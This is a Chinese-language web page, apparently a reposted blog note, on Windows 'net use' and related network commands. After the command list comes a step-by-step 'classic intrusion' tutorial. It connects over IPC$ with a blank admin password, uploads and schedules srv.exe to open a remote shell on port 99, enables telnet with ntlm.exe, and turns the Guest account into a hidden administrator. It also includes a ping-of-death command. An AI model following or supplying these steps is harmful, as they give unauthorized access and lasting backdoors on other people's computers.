| net use 訪問遠(yuǎn)程電腦 | 您所在的位置:網(wǎng)站首頁 › ipc文件夾可以刪除嗎 › net use 訪問遠(yuǎn)程電腦 |
|
net use \\ip\ipc$ " " /user:" " 建立IPC空鏈接 net use \\ip\ipc$ "密碼" /user:"用戶名" 建立IPC非空鏈接 net use h: \\ip\c$ "密碼" /user:"用戶名" 直接登陸后映射對(duì)方C:到本地為H: net use h: \\ip\c$ 登陸后映射對(duì)方C:到本地為H: net use \\ip\ipc$ /del 刪除IPC鏈接 net use h: /del 刪除映射對(duì)方到本地的為H:的映射 net user 用戶名 密碼 /add 建立用戶 net user guest /active:yes 激活guest用戶 net user 查看有哪些用戶 net user 帳戶名 查看帳戶的屬性 net localgroup administrators 用戶名 /add把“用戶”添加到管理員中使其具有管理員權(quán)限,注意:administrator后加s用復(fù)數(shù) net start 查看開啟了哪些服務(wù) net start 服務(wù)名 開啟服務(wù);(如:net start telnet, net start schedule) net stop 服務(wù)名 停止某服務(wù) net time \\目標(biāo)ip 查看對(duì)方時(shí)間? net time \\目標(biāo)ip /set 設(shè)置本地計(jì)算機(jī)時(shí)間與“目標(biāo)IP”主機(jī)的時(shí)間同步,加上參數(shù)/yes可取消確認(rèn)信息 net view 查看本地局域網(wǎng)內(nèi)開啟了哪些共享 net view \\ip 查看對(duì)方局域網(wǎng)內(nèi)開啟了哪些共享 net config 顯示系統(tǒng)網(wǎng)絡(luò)設(shè)置 net logoff 斷開連接的共享 net pause 服務(wù)名 暫停某服務(wù)? net send ip "文本信息" 向?qū)Ψ桨l(fā)信息 net ver 局域網(wǎng)內(nèi)正在使用的網(wǎng)絡(luò)連接類型和信息 net share 查看本地開啟的共享 net share ipc$ 開啟ipc$共享 net share ipc$ /del 刪除ipc$共享 net share c$ /del 刪除C:共享 net user guest 12345 用guest用戶登陸后用將密碼改為12345 net password 密碼 更改系統(tǒng)登陸密碼 netstat -a 查看開啟了哪些端口,常用netstat -an netstat -n 查看端口的網(wǎng)絡(luò)連接情況,常用netstat -an netstat -v 查看正在進(jìn)行的工作 netstat -p 協(xié)議名 例:netstat -p tcq/ip 查看某協(xié)議使用情況(查看tcp/ip協(xié)議使用情況) netstat -s 查看正在使用的所有協(xié)議使用情況 nbtstat -A ip對(duì)方136到139其中一個(gè)端口開了的話,就可查看對(duì)方最近登陸的用戶名(03前的為用戶名)-注意:參數(shù)-A要大寫 tracert -參數(shù) ip(或計(jì)算機(jī)名) 跟蹤路由(數(shù)據(jù)包),參數(shù):“-w數(shù)字”用于設(shè)置超時(shí)間隔。 ping ip(或域名)向?qū)Ψ街鳈C(jī)發(fā)送默認(rèn)大小為32字節(jié)的數(shù)據(jù),參數(shù):“-l[空格]數(shù)據(jù)包大小”;“-n發(fā)送數(shù)據(jù)次數(shù)”;“-t”指一直ping。 ping -t -l 65550 ip 死亡之ping(發(fā)送大于64K的文件并一直ping就成了死亡之ping) ipconfig (winipcfg) 用于windows NT及XP(windows 9598)查看本地ip地址,ipconfig可用參數(shù)“/all”顯示全部配置信息 tlist -t 以樹行列表顯示進(jìn)程(為系統(tǒng)的附加工具,默認(rèn)是沒有安裝的,在安裝目錄的Support/tools文件夾內(nèi)) kill -F進(jìn)程名加-F參數(shù)后強(qiáng)制結(jié)束某進(jìn)程(為系統(tǒng)的附加工具,默認(rèn)是沒有安裝的,在安裝目錄的Support/tools文件夾內(nèi)) del -F文件名加-F參數(shù)后就可刪除只讀文件,/AR、/AH、/AS、/AA分別表示刪除只讀、隱藏、系統(tǒng)、存檔文件,/A-R、/A-H、/A-S、/A-A表示刪除除只讀、隱藏、系統(tǒng)、存檔以外的文件。例如“DEL/AR*.*”表示刪除當(dāng)前目錄下所有只讀文件,“DEL/A-S *.*”表示刪除當(dāng)前目錄下除系統(tǒng)文件以外的所有文件 ? net use的使用雜項(xiàng) 2008-01-1610:19:21 閱讀160評(píng)論0??字號(hào):大中小?訂閱 老是忘了 net use 怎么樣,今天在網(wǎng)上找一篇,貼在這,感謝原作者分享。 原文地址:http://zhidao.baidu.com/question/18772395.html 1)建立空連接: net use \\IP\ipc$ "" /user:"" (一定要注意:這一行命令中包含了3個(gè)空格) 2)建立非空連接: net use \\IP\ipc$ "密碼" /user:"用戶名" (同樣有3個(gè)空格) 3)映射默認(rèn)共享: net use z: \\IP\c$ "密碼" /user:"用戶名" (即可將對(duì)方的c盤映射為自己的z盤,其他盤類推) 如果已經(jīng)和目標(biāo)建立了ipc$,則可以直接用IP+盤符+$訪問,具體命令 net use z: \\IP\c$ 4)刪除一個(gè)ipc$連接 net use \\IP\ipc$ /del 5)刪除共享映射 net use c: /del 刪除映射的c盤,其他盤類推 net use * /del 刪除全部,會(huì)有提示要求按y確認(rèn) 3 查看遠(yuǎn)程主機(jī)的共享資源(但看不到默認(rèn)共享) net view \\IP 4 查看本地主機(jī)的共享資源(可以看到本地的默認(rèn)共享) net share 5 得到遠(yuǎn)程主機(jī)的用戶名列表 nbtstat -A IP 6 得到本地主機(jī)的用戶列表 net user 7 查看遠(yuǎn)程主機(jī)的當(dāng)前時(shí)間 net time \\IP 8 顯示本地主機(jī)當(dāng)前服務(wù) net start 9 啟動(dòng)/關(guān)閉本地服務(wù) net start 服務(wù)名 /y net stop 服務(wù)名 /y 10 映射遠(yuǎn)程共享: net use z: \\IP\baby 此命令將共享名為baby的共享資源映射到z盤 11 刪除共享映射 net use c: /del 刪除映射的c盤,其他盤類推 net use * /del /y刪除全部 12 向遠(yuǎn)程主機(jī)復(fù)制文件 copy \路徑\srv.exe \\IP\共享目錄名,如: copy ccbirds.exe \\*.*.*.*\c 即將當(dāng)前目錄下的文件復(fù)制到對(duì)方c盤內(nèi) 13 遠(yuǎn)程添加計(jì)劃任務(wù) at \\ip 時(shí)間 程序名,如: at \\127.0.0.0 11:00 love.exe 注意:時(shí)間盡量使用24小時(shí)制;在系統(tǒng)默認(rèn)搜索路徑(比如system32/)下不用加路徑,否則必須加全路徑 14 開啟遠(yuǎn)程主機(jī)的telnet 這里要用到一個(gè)小程序:opentelnet.exe,各大下載站點(diǎn)都有,而且還需要滿足四個(gè)要求: 1)目標(biāo)開啟了ipc$共享 2)你要擁有管理員密碼和帳號(hào) 3)目標(biāo)開啟RemoteRegistry服務(wù),用戶就該ntlm認(rèn)證 4)對(duì)WIN2K/XP有效,NT未經(jīng)測試 命令格式:OpenTelnet.exe \\server account psw NTLM認(rèn)證方式 port 試?yán)缦拢篶:\>OpenTelnet.exe \\*.*.*.* administrator "" 190 15 激活用戶/加入管理員組 1 net uesr account /active:yes 2 net localgroup administrators account /add 16 關(guān)閉遠(yuǎn)程主機(jī)的telnet 同樣需要一個(gè)小程序:ResumeTelnet.exe 命令格式:ResumeTelnet.exe \\server account psw 試?yán)缦拢篶:\>ResumeTelnet.exe \\*.*.*.* administrator"" 17 刪除一個(gè)已建立的ipc$連接 net use \\IP\ipc$ /del 九 經(jīng)典入侵模式 這個(gè)入侵模式太經(jīng)典了,大部分ipc教程都有介紹,我也就拿過來引用了,在此感謝原創(chuàng)作者!(不知道是哪位前輩) 1. C:\>net use \\127.0.0.1\IPC$ ""/user:"admintitrators" 這是用《流光》掃到的用戶名是administrators,密碼為"空"的IP地址(空口令?哇,運(yùn)氣好到家了),如果是打算攻擊的話,就可以用這樣的命令來與127.0.0.1建立一個(gè)連接,因?yàn)槊艽a為"空",所以第一個(gè)引號(hào)處就不用輸入,后面一個(gè)雙引號(hào)里的是用戶名,輸入administrators,命令即可成功完成。 復(fù)制之前務(wù)必用net view \\IP這個(gè)命令看一下對(duì)方的共享情況 2. C:\>copy srv.exe \\127.0.0.1\admin$ 先復(fù)制srv.exe上去,在流光的Tools目錄下就有(這里的$是指admin用戶的c:\winnt\system32\,大家還可以使用c$、d$,意思是C盤與D盤,這看你要復(fù)制到什么地方去了)。 3. C:\>net time \\127.0.0.1 查查時(shí)間,發(fā)現(xiàn)127.0.0.1 的當(dāng)前時(shí)間是 2002/3/19 上午 11:00,命令成功完成。 4. C:\>at \\127.0.0.1 11:05 srv.exe 用at命令啟動(dòng)srv.exe吧(這里設(shè)置的時(shí)間要比主機(jī)時(shí)間快,不然你怎么啟動(dòng)啊,呵呵!) 5. C:\>net time \\127.0.0.1 再查查到時(shí)間沒有?如果127.0.0.1 的當(dāng)前時(shí)間是 2002/3/19 上午 11:05,那就準(zhǔn)備開始下面的命令。 6. C:\>telnet 127.0.0.1 99 這里會(huì)用到Telnet命令吧,注意端口是99。Telnet默認(rèn)的是23端口,但是我們使用的是SRV在對(duì)方計(jì)算機(jī)中為我們建立一個(gè)99端口的Shell。 雖然我們可以Telnet上去了,但是SRV是一次性的,下次登錄還要再激活!所以我們打算建立一個(gè)Telnet服務(wù)!這就要用到ntlm了 7.C:\>copy ntlm.exe \\127.0.0.1\admin$ 用Copy命令把ntlm.exe上傳到主機(jī)上(ntlm.exe也是在《流光》的Tools目錄中)。 8. C:\WINNT\system32>ntlm 輸入ntlm啟動(dòng)(這里的C:\WINNT\system32>指的是對(duì)方計(jì)算機(jī),運(yùn)行ntlm其實(shí)是讓這個(gè)程序在對(duì)方計(jì)算機(jī)上運(yùn)行)。當(dāng)出現(xiàn)"DONE"的時(shí)候,就說明已經(jīng)啟動(dòng)正常。然后使用"netstart telnet"來開啟Telnet服務(wù)! 9. Telnet127.0.0.1,接著輸入用戶名與密碼就進(jìn)入對(duì)方了,作就像在DOS上作一樣簡單!(然后你想做什么?想做什么就做什么吧,哈哈) 為了以防萬一,我們?cè)侔裧uest激活加到管理組 10. C:\>net user guest /active:yes 將對(duì)方的Guest用戶激活 11. C:\>net user guest 1234 將Guest的密碼改為1234,或者你要設(shè)定的密碼 12. C:\>net localgroup administrators guest/add 將Guest變?yōu)锳dministrator^_^(如果管理員密碼更改,guest帳號(hào)沒改變的話,下次我們可以用guest再次訪問這臺(tái)計(jì)算機(jī)) 另外,你也可以根據(jù)返回的錯(cuò)誤號(hào)分析原因: 錯(cuò)誤號(hào)5,拒絕訪問:很可能你使用的用戶不是管理員權(quán)限的,先提升權(quán)限; 錯(cuò)誤號(hào)51,Windows無法找到網(wǎng)絡(luò)路徑:網(wǎng)絡(luò)有問題; 錯(cuò)誤號(hào)53,找不到網(wǎng)絡(luò)路徑:ip地址錯(cuò)誤;目標(biāo)未開機(jī);目標(biāo)lanmanserver服務(wù)未啟動(dòng);目標(biāo)有防火墻(端口過濾); 錯(cuò)誤號(hào)67,找不到網(wǎng)絡(luò)名:你的lanmanworkstation服務(wù)未啟動(dòng)或者目標(biāo)刪除了ipc$; 錯(cuò)誤號(hào)1219,提供的憑據(jù)與已存在的憑據(jù)集沖突:你已經(jīng)和對(duì)方建立了一個(gè)ipc$,請(qǐng)刪除再連; 錯(cuò)誤號(hào)1326,未知的用戶名或錯(cuò)誤密碼:原因很明顯了; 錯(cuò)誤號(hào)1792,試圖登錄,但是網(wǎng)絡(luò)登錄服務(wù)沒有啟動(dòng):目標(biāo)NetLogon服務(wù)未啟動(dòng); 錯(cuò)誤號(hào)2242,此用戶的密碼已經(jīng)過期:目標(biāo)有帳號(hào)策略,強(qiáng)制定期要求更改密碼 |
| CopyRight 2018-2019 實(shí)驗(yàn)室設(shè)備網(wǎng) 版權(quán)所有 |